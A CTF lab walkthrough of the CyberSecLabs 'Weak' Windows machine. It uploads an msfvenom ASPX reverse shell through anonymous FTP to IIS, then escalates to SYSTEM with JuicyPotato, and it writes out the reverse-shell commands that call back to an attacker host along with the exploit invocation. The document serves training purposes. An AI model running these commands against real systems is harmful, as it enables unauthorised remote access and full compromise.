CyberSecLabs Weak Walkthrough

RHOST = 172.31.1.11

LHOST = 172.21.1.1

Getting a Foothold

Weak is a windows machine which has port 80 open which shows an IIS welcome page.
It also has FTP anonymous login allowed, so we can upload an aspx reverse shell and execute using browser to get a shell back.

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1
lport=443 -f aspx > shell.aspx

Uploading Shell.aspx

http://172.31.1.11/shell.aspx

Execute Shell.aspx

Getting a shell back

Privilege Escalation

Running whoami /priv we get SeImpersonatePrivilege token enabled
So we can perform Juicy Potato attack.

SeImpersonatrePrivilege Enabled

Running systeminfo we come to know it is a windows 7 machine

Windows 7 x64 bit

Ok so how to perform juicy potato attack?

In order to perform juicy potato attack we need few arguments

JuicyPotato Arguments

JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c
{CLSID_Value}

For {Any_Port} we can litterally use any working port that is not blocked by the windows

For {Program_To_Execute} we can create a msfvenom exe reverse shell and execute it to get a shell back

For {CLSID_Value} we have to find the correct CLSID value from the list.

How to find CLSID_Value?

Download the CLSID list according to the operating system

https://github.com/ohpe/juicy-potato/tree/master/CLSID

Currently Following Operating System’s CLSID have been obtained

1. Windows_10_Enterprise
2. Windows_10_Pro
3. Windows_7_Enterprise
4. Windows_8.1_Enterprise
5. Windows_Server_2008_R2_Enterprise
6. Windows_Server_2012_Datacenter
7. Windows_Server_2016_Standard

So for this scenario it is windows 7, so grab CLSID.list for windows 7 : Download Here

Next Download TestCLSID.bat file which would test all the CLSID’s from the CLSID.list we pass to it.

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

Now make sure to upload JuicyPotato.exe, TestCLSID.bat and CLSID.list to same folder in victim’s machine.

Upload all in same folder

Then execute TestCLSID.bat in Terminal and let it run for 5 minutes.

It would start scanning CLSID’s from the CLSID.list and would store the output in result.log

Open the result.log and you should find many CLSID’s there

Working CLSID’s

Select any one CLSID from this list, but make sure it is running with Higher Privileges (i.e: NT AUTHORITY\SYSTEM) and not running as the user.

JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c
{CLSID_Value}

Now we have all the pieces that needs to placed

{Any_Port} = 1337

{Program_To_Execute} = shell.exe (Generated by msfvenom)

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1
lport=443 -f exe -o shell.exe

{CLSID_Value} = 687e55ca-6621–4c41-b9f1-c0eddc94bb05

Execute Juicy Potato

Execute

JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c
{687e55ca-6621–4c41-b9f1-c0eddc94bb05}

And we Would get us a NT AUTHORITY shell on port 443

That’s it for this simple Walk through of an easy windows machine. I Hope you learned something out of it !